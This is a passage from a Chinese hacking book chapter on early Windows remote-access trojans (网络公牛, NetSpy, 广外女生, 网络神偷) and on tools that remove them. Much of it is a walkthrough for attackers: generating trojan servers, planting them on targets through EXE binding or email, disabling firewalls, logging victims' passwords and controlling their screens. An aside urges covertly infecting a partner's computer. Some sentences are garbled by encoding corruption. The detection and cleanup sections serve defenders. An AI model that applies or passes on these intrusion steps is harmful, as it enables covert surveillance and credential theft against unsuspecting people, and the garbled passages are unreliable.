winhelp.exe 3KB regedit.exe 120KB winmine.exe 24KB 如果文件大小与以上所列数据不符的话,就说明该文件已经被绑定网络公牛服务器端程序。 ④ 就可以选择将被绑定的文件删除,并把其他地方正常的程序过来复制就可以了。当然也可以打开【附件】→【系统工具】→【系统信息】工具,如图 3-69 所示。 图 3-69 【系统信息】工具 ⑤ 在【系统信息】工具中,选择菜单【工具】→【系统文件检查器】命令,如图 3-70 所示,就会打开图 3-71 所示的【系统文件检查器】 。 ⑥ 在系统文件检查器中,选择【扫描改动过的文件】选项,然后单击【开始】按钮,系统文件检查器就会自动扫描,当发现某个文件的大小与安装时不符,就会给 出提示,例如它检查出文件 RNAPH.DLL 已经改动过,就会给出如图 3-72 所示的提示。 图 3-70 【系统文件检查器】命令 图 3-71 系统文件检查 ⑦ 看到【还原文件】选项了吗,选择它,接着单击【确定】按钮,打开图 3-73 所示的对话框,在该对话框中,选择 Windows 9X 安装盘所在的路径,选择该文件所 在的位置(上述文件都在 C:\PWIN98\SYSTEM 下) ,然后单击【确定】按钮,被网络公牛绑定的文件就被恢复了。 ⑧ 然后清除注册表中与 CheckDll.exe 相关的内容。 4.网络公牛服务器端卸*髑宄 对于网络公牛的清除操作,可以使用网络公牛服务器端卸*鹘湫对兀眯对毓ぞ呤且桓鲈 DOS 下运行的程序,文件名为 UNetBull.exe,只有几十 K 大小。该工 具的使用方法非常简单,在卸载完成之后,按一下回车键就可以退出 DOS 命令窗口,清除完毕就可以了。 服务器端卸*鞯奶氐闶悄芄蛔远宄绻5乃邢喙啬谌荩⑶以诙员煌绻0蠖ǖ奈募行薷暮螅衙扛鑫募拇笮≡黾恿 1KB,如 notepad.exe 的原 始大小为 52KB,经网络公牛服务器卸*餍薷闹螅笮”涑 53KB。 图 3-72 扫描改动过的文件 图 3-73 【还原文件】对话框 这样一来,当网络公牛木马再次感染这台计算机的时候,就会误认为该文件已经被绑定,从而放弃对该文件的绑定。 网络公牛的设计还是很有特色的,不过使用的人并不多。因为它不带卸载程序,中了网络公牛的机器又会被关联许多系统文件,清除的难度可想而知。如果中了招又 不知道如何清除的话,相必哭都哭不出来。 【题外话】 笔者在这里想说句令该软件作者不高兴的话, 《网络公牛》基本上就是冰河软件的缩写版,所以在功能上也就大大地不如冰河!但如果从远程控制的角度讲,它倒的 确是一个好软件,一般情况下,除了自己之外,没人知道这个机子中了木马(这是因为 peep.exe 没有嗅探和查找主机的功能) ,也就只有唯一的自己才能够控制这台 机器。 所以,只要不至于太滥,人人都可以进去捣鼓一番,因此可以大胆地和自己的心上人安装运行这个软件(可省去配置邮箱这个环节,因为这样可能会查出自己的 IP) , 然后,互相交流自己的图片,MP3 甚至是 RM 小电影...... 3-4-4 远程监控杀手——网络精灵木马(NetSpy) “网络精灵”远程监控系统是一套通过网络协议,对网络上的机器进行自动监控、管理的软件。“网络精灵”分为管理器和控制器两部分,管理器安装于管理员的计 算机上,实现对客户计算机的管理;控制器安装于客户计算机上,对来自管理器的要求作出反应,实现系统的各项功能。 1.网络精灵(NetSpy)的使用 在网络精灵的软件包中,共有如图 3-74 所示文件,其作用如下: ● netspy.exe:网络精灵服务器端程序。 ● netmonitor.exe:网络精灵客户端控制程序。 ● zip.dll:支持远端压缩功能的插件。 ● netmonitor.chm:帮助文件。 图 3-74 网络精灵的文件 网络精灵服务器端程序在使用前,不需要进行什么特殊设置,只要把它植入到目标主机上直接运行就可以了,在运行之后,网络精灵就会自动把安装文件 netspy.exe 删除掉了。 在把网络精灵的服务器端程序植入到目标主机之后,就可以利用网络精灵客户端程序来对目标主机进行控制了,具体的操作方法如下: ① 需要先打开网络精灵客户端程序,如图 3-75 所示。 图 3-75 网络精灵客户端程序 ② 单击【计算机】→【添加】命令,打开【编辑计算机属性】对话框,如图 3-76 所示,接着在该对话框中,输入计算机的名称、地址(目标主机 IP 地址或者域名) , 并且使其他属性保持默认状态。 图 3-76 【编辑计算机属性】对话框 ③ 单击【确认】按钮,客户端程序就会与目标主机上的服务器端程序进行连接了。如果系统提示连接成功,则会在客户端窗口中显示目标主机的硬盘分区信息。 ④ 这时在网络精灵客户端的窗口中,就可以对目标主机上的文件进行各种操作了,操作的方法类似于 Windows 中的资源管理。这里就只针对网络精灵的文件压缩功 能对其来进行一些介绍。

⑤ 在网络精灵客户端窗口中,选中目标主机,然后选择菜单【查看】→【刷新】命令,或者使用功能键 F5,以显示目标主机的硬盘分区信息。 ⑥ 接着展开 C:\Windows\SYSTEM,单击鼠标右键并在弹出的快捷菜单中选择【上传文件】命令。在打开的【文件】对话框中选择本地的文件 zip.dll,如图 3-77 所 示,在单击【打开】按钮之后,zip.dll 文件就会被网络精灵上传到受控机中了。 ⑦ 在把压缩插件 zip.dll 上传到指定位置后,网络精灵客户端程序就可以对受控机上的文件进行压缩了。选定要压缩的文件,然后选择菜单【文件】→【压缩】命令, 就会打开【压缩文件】对话框,在该对话框中输入压缩之后的目标文件名,指定压缩比,然后单击【确定】按钮,就会在受控机上的指定位置产生一个压缩文件。 在网络精灵客户端的【文件】菜单中,除了一些文件的操作命令之外,还有一个【执行】命令,如图 3-78 所示。 图 3-77 【打开】对话框 图 3-78 【文件】菜单 ⑧ 这时候如果选择【执行】命令,打开【执行命令】对话框,如图 3-79 所示,在该对话框中输入要执行的命令或者可执行文件的名称,例如 notepad.exe,然后单 击【确定】按钮,就会把受控机上的记事本程序打开了。 ⑨ 另外,还可以为网络精灵的客户端程序设置密码,选择【文件】→【设定密码】命令,打开【设定密码】对话框,如图 3-80 所示。因为网络精灵客户端的默认密 码为空,所以只要在新密码和重复新密码文本框中填入想要新设置的密码就可以了。 图 3-79 【执行命令】对话框 图 3-80 【设定密码】对话框 ⑩ 如果在这里单击了【确定】按钮,那么,当下次启动网络精灵客户端程序时,系统就会弹出密码对话框,只有在该对话框中输入正确的密码,才能进入网络精灵 客户端程序的窗口。网络精灵客户端对受控机的控制命令主要在菜单【工具】中。 网络精灵控制命令的使用方法如下所示: ● 发送消息:可以发送文本消息给受控机,如图 3-81 所示。 ● 关闭计算机:关闭受控机。 ● 查看屏幕:查看受控机的屏幕,可以在【屏幕】窗口中设置屏幕缩放比,屏幕图像压缩质量,设置完成之后,单击【刷新】按钮才能看到指定规格的受控机屏幕 图像。另外,还可以设置循环查看受控机屏幕,并可以设置循环刷新的时间间隔。 ● 进程管理:列举受控机上的所有进程,并且可以终止进程。 ● 拨号网络监视器:监视受控机拨号上网的连接情况,如图 3-82 所示。 ● 共享管理:显示受控机上的所有共享,可以新建、删除共享,设置共享的属性。 ● 系统信息:显示系统信息。 ● 显示缓存口令:显示保存在受控机上的所有口令。 图 3-81 发送消息 图 3-82 监视受控机拨号上网的情况 ● 远程终端:使用客户端的鼠标和键盘直接操纵受控机。 ● Web 方式监控:Web 方式监控是网络精灵的一大特点,网络精灵可以使用网页浏览器代替客户端程序来监控受控机,这使得对受控机的监控变得更加灵活方便。 如果在这里选择了【Web 方式监控】命令,则以后只要在 IE 中打开该网页,就可以使用 Web 方式来向受控机发送监控命令。其实还可以在 IE 中直接键入 IP 地址和 端口号,如 61.52.142.105:7306 来连接植入网络精灵木马的远程计算机。 2.网络精灵(Netspy)的检测和消除 由于网络精灵的默认连接端口是 7306,因此可以先用“netstat –a”命令来检查自己机器中的 7306 端口是否处于打开状态,如果打开,则这台计算机可能已经中了 网络精灵木马。 由于网络精灵中有浏览器监控功能,所以如果发现 7306 端口打开,就可以在 IE 中访问“http://本机 IP 地址:7306”,如果访问能够成功,则会出现网络精灵 Web 监 控窗口,那么表明这台计算机中了网络精灵木马。 同样,如果用“netstat –a”没有发现 7306 端口,但是发现了其他可疑的端口正开放着,也可以在浏览器中访问这个端口,以确认是否中了网络精灵木马。 网络精灵木马的清除包括下面两个步骤: ① 重新启动机器,进入 DOS 命令行状态。对于 Windows 9x,在 C:\Windows\system\目录下输入命令 delnetspy.exe 回车,删除网络精灵服务端程序;对于 Windows NT/2000,在 C:\Winnt\system32\目录下,输入命令“del netspy.exe”回车,删除网络精灵服务端程序。 ② 进入注册表编辑器 然后在 HKEY_LOCAL_MACHINE\Software\Microsoft\windows\ CurrentVersion\Run\下找到并删除 Netspy 的键值就可以安全清除 Netspy 了 , 。 3-4-5 远程控制少不了它——广外女生木马 广外女生是一种远程监控工具,破坏性很大。该程序运行后,会在系统的 SYSTEM 目录下生成一份自己的拷贝,名称为 DIAGCFG.EXE,并关联.EXE 文件的打开方 式,如果贸然删掉了该文件,将会导致系统所有.EXE 文件无法打开。 其可怕之处在于广外女生服务端被执行后,会自动检查进程中是否含有“金山毒霸”、“防火墙”、“iparmor”、“tcmonitor”、“实时监控”、“lockdowt”、 “kill”、“天网”等字样,如果发现就将该进程终止,也就是说使防火墙完全失去作用! 1.广外女生的使用 本节以广外女生 1.53B 为例来说明一下广外女生木马的使用。 具体操作步骤如下: ① 生成服务端文件 为了避免用户不小心点击了服务端程序,从广外女生 1.5B 版开始,服务端文件是由客户端程序生成的,因此可以看到,广外女生软件包中只有一个可执行文件

gwgirl.exe,这就是广外女生的客户端程序。 双击广外女生的客户端程序 gwgirl.exe,打开如图 3-83 所示的广外女生客户端窗口。在广外女生客户端窗口中选择【服务端设置】选项卡,如图 3-84 所示。 图 3-83 广外女生客户端窗口 图 3-84 【服务端设置】选项卡 在【服务端设置】选项卡中,设置广外女生服务器端程序的属性。其实在这个选项卡中生成的是广外女生的服务端安装程序,该安装程序在目标主机上运行之后,会 把广外女生的服务端文件和相关的动态链接库文件安装到目标主机的 C:\WINNT\System32(Windows NT/2000) ,或者 C:\Windows\System(Windows 9X)下,服 务端程序运行后,会打开一个端口等待客户端的连接,并且在注册表的启动区新建一个键值。 【服务端设置】选项卡中设置的服务端属性包括: ● 安装后服务端文件名:默认为 DIAGCFG.EXE。 ● 动态链接库文件的文件名:也被安装到系统目录中,默认为 MSIESMTP.DLL。 ● 服务端使用的端口号:默认为 62670。 ● 安装时的错误提示:如果该项的内容为空,则服务端安装程序执行的时候,没有任何提示,如果该项内容不为空,则在运行时打开一个消息提示对话框。 ● 连接时验证密码:客户端与服务端连接时需要使用的验证密码,这样可以避免自己植入目标主机的广外女生密码被他人使用。 ● 注册表项目名称:在注册表启动区中新建的键值名称。 ● 防火墙处理:广外女生区别于其他木马的一个特点就是能自动把一些防火墙程序关闭,在这里设置需要关闭的防火墙程序窗口名称的关键字。 ● 邮件通知列表:广外女生可以把植入的目标主机的 IP 地址通过邮件发送到指定的邮箱(不能使用需密码验证的邮件服务器来发送邮件通知) 。在邮件通知列表中 单击鼠标右键,选择快捷菜单中的【添加】命令,打开【邮件通知消息】对话框中,在该对话框中,设置发送邮件的服务器(SMTP 服务器) ,目标邮箱地址,以及 邮件的主题。 对广外女生的服务端设置完成之后,单击 【生成服务端】 按钮,就会在该客户端当前所在的文件夹中生成一个广外女生的服务器端程序,默认的文件名为 GDUFS.exe。 ② 选择目标,植入木马(方法如前面的章节所示) 。 ③ 添加主机,开始控制。 该步骤分两种情况: ● 已经知道某 IP 对应的计算机中了广外女生 如果已经知道了某个 IP 对应的计算机已经中了广外女生,则方法如下: 需要直接在起始 IP 和终止 IP 中输入同一个 IP 地址,如图 3-85 所示。 图 3-85 输入同一个 IP 地址 然后输入设置服务端文件时选择的端口号和连接密码,其中任何一个地方输入错误都会导致连接失败。等待时限就是当网络速度比较慢时增加超时的设置,单位是毫 秒(一秒=1000 毫秒) 。如果连接成功,就会在列表中出现该 IP 地址和端口号。 可以同时添加多台主机进行控制,这里需要注意的是:如果需要在查看另外一台机的屏幕浏览和设置邮件通知,获取密码的话,就需要在这里进行切换。方法是用鼠 标选中列表中想看的主机即可。而文件共享、注册表、进程管理等操作,都不需要再切换主机的操作。 ● 盲目搜索 如果大家只是想看看自己周围有没有中了【广外女生】的机器,也可以使用该功能。一般是选择与自己同一个子网的 IP 地址进行搜索。 ④ 文件共享 与目标主机上的广外女生服务端程序连接之后,可以在【文件共享】选项卡中浏览目标主机的所有磁盘分区、文件夹、文件,可以下载、上传文件,删除或更改指定 文件的属性,删除指定的空文件夹,还有向目标主机发送消息,运行程序和关闭目标主机等操作,但是没有文件搜索和压缩功能。 ⑤ 远程注册表管理 在【远程注册表】选项卡中,可以对目标主机的注册表进行管理,该选项卡中的注册表管理窗口模拟了 Windows 中的注册表编辑器。 ⑥ 进程管理 在【进程管理】选项卡中,可以对目标主机上的所有进程进行管理。在这个选项卡中,列举了目标主机上的所有进程,以及进程的线程,线程的窗口与子窗口。 对于窗口,可以进行隐藏窗口、显示窗口、使窗口居中、使窗体变灰、激活变灰窗体等操作。 ⑦ 屏幕控制 在【屏幕控制】选项卡中,有 5 个按钮: ● 预览按钮:根据画质选项进行屏幕截取,用 56K 的 Modem 大概 10 秒钟时间就可以完成低画质的截取,而高画质截取则需要 1 分钟左右。 ● 全屏查看:使用预览功能后由于目标主机屏幕是显示在客户端的窗口中,可能有些部分显示不清楚,可以使用该功能把画面按实际的大小放大。 如果使用的分辨率和目标主机的不同,客户端会自动更改客户端的分辨率来显示对方的屏幕画面,因此客户端的软件要求安装了微软的 DirectX 5.0 或者更高版本。 ● 开始控制:该功能只适合网速很快的地方,如 ADSL 或局域网(LAN) ,因为需要不断地进行图像数据的传输,所以建议谨慎使用。控制时自己的画面会全屏显示 目标主机的屏幕,就像坐在目标主机的屏幕前面一样。 可以用鼠标点击,拖动目标主机屏幕上的图标、窗体等,还能在自己键盘上为目标主机输入文字,完全做到键盘鼠标的远程控制。要恢复自己的屏幕只需要按 Alt+F4 就可以了。 ● 图片另存为:如果遇到什么有趣的画面,可以用图片另存为把图片保存下来。

● 关闭/打开显示器:单击【关闭显示器】按钮,可以把目标主机的显示器关闭,此时按钮上的文字变成【打开显示器】 。 ⑧ 密码记录 在【密码记录】选项卡中,可以查看广外女生服务端的密码记录。当目标主机在与密码相关的对话框中输入用户名和密码的时候,服务端的程序会把用户名和密码的 信息记录下来。在客户端的【密码记录】选项卡中,单击【获取记录】按钮就可以查看服务端程序记录的用户名密码信息。单击【清空记录】按钮,可以清除服务器 端保存的密码记录,单击【保存记录】按钮,可以把服务端的密码记录保存到客户端。 2. 检测和清除广外女生 由于广外女生服务端程序运行的默认端口是 6267,所以可以使用“netstat –a”命令来查看计算机上是否开放了 6267 端口。如果开放了 6267 端口,则说明中了广 外女生。 具体的操作步骤如下: ① 点击【开始】→【运行】命令,输入 cmd,然后按回车键,打开命令行窗口。 ② 接着在命令行窗口中输入“netstat –a”命令,来查看是否开放了 6267 端口。 下面以在 Windows XP 中为例来清除广外女生木马: ① 点击【开始】→【运行】命令,输入 Regedit,打开注册表编辑器,然后依次展开 HKEY_ LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\, 如图 3-86 所示。 图 3-86 打开注册表 【注意】 这时候最好先不要修改,因为如果这时就修改注册表的话,广外女生的服务端程序 DIAGCFG.EXE 的进程会立刻把它改回来的。 ② 保持注册表管理器打开,按 Ctrl+Alt+Del 组合键,然后在【任务管理器】中找到 DIAGCFG.EXE 这个进程,选中它,按【结束进程】来关掉这个进程。 ③ 把 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\的键值由原来的 C:\WINNT\System32\DIAGCFG.EXE "%1" %* 改为"%1" % *。 ④ 删除 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Scrvices 下与 DIAGCFG.EXE 相关的键值。 ⑤ 这时候只要再删除 C:\WINNT\System32\目录下的 DIAGCFG.EXE 就可以了。 3-4-6 网络江湖的神秘高手——网络神偷 查看一下网络上的资料,就可以发现,对“网络神偷”木马的评价褒贬不一。主要是因为其可实现对本地及远程驱动器进行包括文件删除、复制、移动、修改在内的 各种操作,而且可以任意修改驱动器属性、修改文件属性。并且由于它利用了“反弹端口”原理控制服务端(被控制端)主动连接客户端(控制端) ,因此,只要当 发现客户端让自己开始连接时,就会主动连接。这样,控制端就可以穿过防火墙,甚至还能访问控制局域网内部的电脑。不过,如果正当使用则可以在网上实现两台 电脑的文件交换等工作,为文件传输提供一个很好的*台。 下面就来介绍一下网络神偷的操作方法: ① 下载并解压缩“网络神偷”文件,解压缩后如图 3-87 所示。 ② 软件使用前,必须要先进行设置,就是告诉软件所用的主页空间的一些情况。第一次运行软件时会自动弹出【网络神偷 设置向导】对话框,如图 3-88 所示,只 要根据向导的提示一路单击 【下一步】就可以成功的完成设置了,大部分设置内容都可以从主页空间提供商的网站查到,如果该项设置提供了默认值,不修改也可以。 图 3-87 解压缩后的文件 图 3-88 网络神偷设置向导 ③ 再来生成并运行服务端,单击菜单【网络】→【生成服务端】命令或工具栏按钮 ,这时候,系统将会弹出如图 3-89 所示对话框。服务端程序在生成时,还可以 自定义一些设置,服务端默认的文件名为 Nethief_Server.exe,可以在生成时或生成后任意改名。服务端程序要在客户端设置完成后才能由用户在客户端里面生成。 图 3-89 生成服务端程序 ④ 如果这时候单击了【生成】按钮,系统将会弹出询问对话框,如图 3-90 左图所示,如果确认无误,直接点【是】后就可以生成服务端了,生成完毕会弹出如图 3-90 右图所示。 ⑤ 接下来,就可以将服务端直接复制到对方的电脑上运行,也可以用 Email 发给对方,还可以用 EXE 捆绑软件将服务端与其它软件捆绑后发给对方了。这样,对方 只要运行了服务端,就可以在客户端里的【服务端在线列表】看到它了。 【提示】 由于服务端程序在运行后不会显示任何界面,因此,看上去好像没有什么反应,其实它已经将自己复制到了系统里面,并且会在对方每次开机时自动运行。 这里还需要提醒大家的一点就是:如果对方的系统中原来就有服务端,那么,新的服务端程序会自动判断与旧服务端程序是否相同(包括设置内容) ,如果相同则不 做响应,如若不同,则会先清除掉旧的服务端程序,然后再把自己复制到系统中去。 图 3-90 询问配置是否正确 ⑥ 当服务端出现在【服务端在线列表】时,先选中服务端,然后点按【添加主机】按钮,就会把它添加到文件管理器中,接着再切换到文件管理器界面,如图 3-91 所示,双击此服务端节点(或单击左边的“+”号)就会开始等待服务端的连接,如果一切正常,即可连接成功,如图 3-92 所示。如果等待一段时间后,还没有收到 服务端的连接,可能是对方已经下线,或是由于其它各种未知原因不能连接。 图 3-91 未连接服务端 图 3-92 服务端连接成功 ⑦ 再来看一下文件工具栏,如图 3-93 所示,从左至右分别是:新建文件、新建文件夹、向上一级、刷新、查找、剪切、复制、粘贴、高级运行、删除、查看、属性。

图 3-93 文件工具栏 因为本软件是针对远程文件访问而设计的,所以在这方面功能异常强大,可以说没有一个同类软件可与之匹敌。本软件在设计上高度模仿 Windows 资源管理器,但 有一点不同,它不支持右键菜单,大部分操作可以通过工具栏、主菜单或快捷键完成。这就可以实现对在远程安装了木马服务端程序的计算机进行自由操作了,也就 是在“居家办公”中所说的远程控制。 您是不是觉得黑客技术很好玩而并不像想象中的那么难?事实上,黑客技术往往是计算机网络、系统领域中的先进技术。学*它、掌握它并不是为了去攻击别人,恰 恰相反,是为了提高广大用户的安全意识与防范技术。 3-5 木马的清除和防范 随着科学技术的突飞猛进,木马病毒也变得越来越狡猾,很多木马病毒已经可以借助邮件、网页、局域网、软盘等多种方式进行传播,一些木马病毒甚至能够阻止反 病毒软件对它的检测。 小博士,难道木马病毒真的那么厉害吗? 当然了,不过,利用防火墙进行杀毒和反黑,只是针对了大部分的木马病毒,要真正做到对木马病毒的预防和删除,还必需随时升级正版的防火墙和杀毒软件!!! 清除一般木马的机制原理主要是: ① 检测木马。 ② 找到木马启动档案,一般在注册表及与系统启动相关的档案里能找到木马档案的位置。 ③ 删除木马档案,并且删除注册表或系统启动档案中有关木马的信息。 但对于一些隐藏十分隐蔽的木马,这些措施是无法把它们找出来的,现在检测木马的手段无非是通过网络连接和查看系统进程,事实上,一些技术高明的木马编写者 完全可以通过合理的隐藏通讯和进程使木马很难被检测到。 防火墙是抵挡木马入侵的最好途径,绝大多数木马都是必须采用直接通讯的方式进行连接,虽然它们可以采用一定的方式隐藏这种连结,如只有在收到攻击者特殊数 据封包的时候才启动木马打开通讯端口,连接完毕后木马则马上进入休眠状态。 尽管如此,对一些技术高明的木马,防火墙有时也无能为力,如寄生在 Http 端口上的木马。还有一种是与木马正常控制程序相反的木马,它是通过木马向外面的端 口发送数据,比如它发一个数据到一个主机的 80 端口,任何防火墙都不可能阻塞这种数据封包请求,要不然整个系统就不用上网浏览网页了。 3-5-1 使用 Trojan Remover 清除木马 Trojan Remover 是一种清除木马的常用工具,它的特点是简单易用,操作简便,并且检测和清除木马的功能也比较强。 下面以 TrojanRemover6.0 为例来介绍 TrojanRemover 的使用方法。 ① 安装完成后,打开 TroianRemover6.0,其主界面窗口如图 3-93 所示。 ② 单击 Trojan Remover 6.0 窗口中的【Scan】按钮,Trojan Remover 就开始扫描当前计算机了,检测是否有木马服务端程序存在,如图 3-94 所示。 图 3-93 Trojan Remover 6.0 的主窗口 图 3-94 Trojan Remover 开始扫描 ③ 在检测完成之后,如果 Trojan Remover 发现了木马的服务端程序,就会给出提示,运行完成后如图 3-95 所示。 图 3-95 检测完成 图 3-96 查看扫描记录 ④ 在如图 3-95 所示的对话框中,单击【ViewLog】按钮,就可以查看本次扫描的结果记录了,如图 3-96 所示。 3-5-2 如何使用 The Cleaner 来清除木马 The Cleaner 是国外一个非常有名的木马检测和清除工具,其清除木马的具体操作如下: ① The Cleaner 安装的方法同一般的软件安装类似,基本上就是一路根据安装向导的提示点按【Next】按钮一步一步进行设置。安装完成之后,在【开始】→【程序】 中可以看到 The Cleaner 的程序包中有一些工具。 ② 在 The Cleaner 的工具中,The Cleaner 为主程序,点选它之后,就可以打开如图 3-97 所示的 The Cleaner 4.0 主窗口了。 ③ 在 The Cleaner 主窗口的【File】中,可以选择需要扫描的磁盘分区。一般木马程序都是安装在 C 盘中的,因此主要对 C 盘进行扫描就可以了。在选中要扫描的 磁盘分区后,单击【OK】按钮,就会打开的扫描对话框,如图 3-98 所示,同时扫描开始。 图 3-97 The Cleaner 4.0 主窗口 图 3-98 打开扫描对话框开始扫描 ④ 如果扫描到系统中存在木马,则 The Cleaner 就会把这些木马显示在木马列表中。在扫描结束之后,只需要单击【CleanAll】按钮,就可以把所有扫描到的木马清 除了。 ⑤ 为了解决清除木马的程序很有可能扫描不到新木马的问题,The Cleaner 还专门设计了一个像病毒数据库一样的木马数据库,有专业人员来负责对该木马数据库进 行维护,他们总是会在第一时间把最新出现的木马添加到木马数据库中,这样,The Cleaner 的用户可以从网 上下载和更新自己的木马数据库了。 ⑥ 不知大家发现没有,在 The Cleaner 软件包中,除 The Cleaner 主程序外,还有两个小工具:TCMonitor 和 TCActive!。打开 TCMonitor 工具并在木马服务端程 序运行之后,往往会把自己跟某种文件类型关联起来,在如图 3-99 所示的对话框中。 ⑦ 在这时候就可以看到,在 TCMonitor 的主窗口中,主要是一个注册表主键的列表。在该列表中,列出了最容易被木马修改的注册表主键,TCMonitor 运行后,就 会时刻监视着列表中的注册表主键,只要这些主键下的内容发生变化,TCMonitor 就会给出警告。 图 3-99 TCMonitor 的主窗口 如果在 TCActive!的进程列表中选择了某个进程,然后单击鼠标右键,并且在快捷菜单中选择【Terminate】按钮,就可以结束该进程了。

3-5-3 使用 BoDetect 检测和清除 BO2000 木马 BoDetect 是一个检测和清除 BO 木马的工具,该工具对于 BO 木马的监测和清除非常有效,这里以 BoDetect 3.5 为例,来介绍一下它的具体使用方法。 ① BoDetect 在安装好后,直接点选【开始】→【程序】项,从中选择打开 BoDetect 3.5,BoDetect 3.5 的窗口如图 3-100 所示。 图 3-100 BoDetect 3.5 的主窗口 ② 当打开 BoDelect 3.5 时,默认显示的是第一个选项卡。在打开 BoDetect 3.5 窗口的同时,BoDetect 3.5 就会自动检测系统中是否存在 BO 木马,并且把检测到的 BO 木马显示在第一个选项卡的列表中。 ③ 在检测到存在木马之后,只要单击第一个选项卡中【Remove】 ,BoDetect 3.5 就会清除掉列表中的所有 BO 木马了。 ④ 如果再次打开 BoDetect 3.5,因为已经清除掉了系统中的 BO 木马,所以就会弹出一个提示对话框。并且,BoDetect 3.5 的窗口也不再显示出来。 综上所述,可以看到使用 BoDetect 3.5 来清除 BO 木马是多么的简单。 对于那些被清除的 BO 木马,实际上 BoDetect 3.5 是将其转移到了 BoDemct 自己的目录下,并且在其文件名后加上了.BOD 后缀,如 BO2K.EXE.BOD 就是转移后 的 BO2K 木马程序。同时,BoDetect 3.5 还修复了被 BO 木马修改的注册表。 在 BoDetect 3.5 的第三个选项卡中,也可以看到被转移和重命名的 BO2K 木马程序。 在第三个选项卡中,在【Infected Files】列表中选中 BO2K.EXE.BOD,如果单击【Restore】按钮,就会出现提示对话框,单击对话框中的【OK】按钮,就可以把 BO2K 木马还原,就像重新运行了程序 BO2K.EXE 一样。 如果单击第三个选项卡中的【Cancel】按钮,就会出现删除文件提示对话框,单击对话框中的【OK】按钮,文件 BO2K.EXE.BOD 就会被删除。 在 BoDetect 3.5 中,还可以对 BoDetect 3.5 的属性进行设置,在 BoDetect 3.5 的第二个选项卡中,可以设置 BoDetect 3.5 的属性。 在【General Settings】中,可以选择 BoDetect3.5 的运行方式, 【Autoscan system after BoDetectisloaded】选项表示当打开 BoDetect3.5 时,是否自动检测 BO 木 马,默认值为是。 【Silent Mode】表示只有当 BoDetect 3.5 检测到 BO 木马后,BoDetect 3.5 才会显示窗口或者给出提示对话框,否则运行 BoDetect 3.5 之后,只是在 Windows 任 务栏中显示 BoDetect 3.5 的图标而已。选择【Monitot System】选项之后,BoDetect 3.5 就会设置间隔时间自动检测系统中是否存在 BO 木马。 在【AdminAlert Options】中,可以设置用电子邮件通知系统管理员的功能,选中【Enable AdminAlert】选项后,就可以启用邮件通知功能了。并且还可以设置系统 管理员的电子邮件地址,邮件的标题以及设置发邮件使用的邮件服务器和端口号(只能使用支持匿名发送功能的邮件服务器) 。 在【Logging Options】中,可以设置是否启动日志功能,如果启动日志功能,就可以单击【ViewLog】按钮查看木马检测的记录。单击【ClearLog】按钮,可以清楚 日志。 在【Notification Options】中,可以设置检测到 BO 木马后的动作方式,可以选择的动作有:Open Main BoDetect Window(打开 BoDetect 3.5 主窗口)和 Flash Tray Icon(闪烁 Windows 任务栏中的 BoDetect 3.5 图标) 。 在【Startup Options】中,可以设置是否在系统启动时就自动运行 BoDetect 3.5。 3-5-4 使用 LockDown2000 防火墙防范木马 使用 LockDown 2000 可以使 Internet 用户免于遭受最老练黑客的攻击,阻止任何人闯入自己的计算机,保护自己的文件不被人偷看或删除。如果想要与他人共享自 己的资源,只须列出对方的地址,就可以让对方访问自己的计算机。LockDown 2000 的作用就像一道设在自己计算机和 Internet 之间的防火墙,它会自动地为用户实 时查寻目前世界上的各种黑客程序。 LockDown2000 的主要功能有: ① 能够完全关闭远程用户(很有可能这种用户就是黑客)对你计算机系统的访问; ② 自动追踪所有连接情况,记录黑客的 IP 地址、域名和计算机名称,从而查出黑客是何方人士; ③ 如果有人已经连接到了自己的计算机或正在企图闯入,LockDown 2000 会用不同的声音发出警告。如果有人未经自己的许可,就连接到了该的计算机,它立刻会 在屏幕上弹出警告窗口和实时监控窗口; ④ 实时监控和记录远程用户在自己计算机里的活动情况; ⑤ 能够完全控制 Internet 或局域网的任何连接情况; ⑥ 可以自动地任意断开与一个用户或所有用户的连接,这对于资源共享的计算机而言,是非常重要的; ⑦ 能够记录以前连接到自己计算机的用户资料,能够限制与自己计算机连接的数目; ⑧ 如果喜欢使用 QQ 与外界联系,LockDown 2000 能够向黑客发送无效的文件包,从而使自己的计算机免遭黑客的 QQ 炸弹的攻击; ⑨ 可以查出和中止偷偷运行在自己限制的程序列表中的任何一个程序,这种程序很可能是一种不知名的黑客程序或病毒。 此外,LockDown 2000 还有易于安装、与其它程序不发生任何冲突的特点。 下面以 LockDown2000 v7.0 为例,来说明如何使用 LockDown2000 防火墙来防范木马和对计算机进行安全保护。 1.使用 LockDown 2000 v7.0 防范木马 ① 安装完成之后打开 LockDown2000 v7.0,其主界面窗口如图 3-101 所示。 ② 单击工具条上的【Scan】按钮,或者单击左下方【Troian Scanner】旁边的【Options】按钮,打开扫描木马对话框。然后就可以在该对话框中选择扫描木马的方 式,选择要检查变动的文件等,最后再单击【Scan for Troiails】就开始扫描了。 ③ 在扫描完成后,如果发现木马存在,它就会弹出一个对话框,如图 3-102 所示,在该对话框中,只要单击【Clean information Log】按钮,就可以清除掉木马的

服务端程序了。 ④ 接着在【Options】对话框中,切换到【Detection】选项卡,选择其中的【Detect Trojan Connection Attempts】选项,这样就可以实时监测是否有木马的客户端 连接到当前的计算机,并且报告该木马客户端的 IP 地址。 ⑤ 如果这时候检测到某个 IP 地址经常连接当前的计算机,并且连接行为比较异常,可以在对话框中选中【IP Filtering】选项卡,在该对话框中,设置允许连接的 IP 地址和不允许连接的 IP 地址。 图 3-101 LockDown 2000 的主窗口 图 3-102 扫描发现木马 ⑥ 由于 LockDown 2000 检测木马程序依靠的是其自带的木马数据库,这就留下了一个缺陷:如果当前计算机中的木马比较新,而 LockDown 2000 中的木马数据库 还来不及更新的话,该木马就无法被 LockDown 2000 检测出来。但如果是发现某个远程用户经常连接当前计算机中的某个程序,并且这个程序比较可疑的话,可以 在【Disconnect】选项卡中设置远程用户不能连接的程序。 2.使用 LockDown 2000 v7.0 的其他功能 LockDown 2000 还具有强大的黑客追踪功能,如果发现某个 IP 地址对当前的计算机进行攻击,可以追踪到该 IP 地址的 ISP。 LockDown 2000 通过对启动文件和系统文件注册表的实时监视来识别闯入自己系统的特洛伊木马程序,如果某个程序在运行前要重新启动计算机,它就会提示用户 是否在每次启动系统时运行该程序,由此可根据该程序是否是自己已知的程序进行判断和监控,从而防止黑客程序偷偷加入后随系统启动自动运行。 使用 LockDown 2000,还可以查看当前计算机中的所有共享信息。 在 LockDown 2000 中,还可以查看当前正在被远程用户连接的共享资源。在【Share 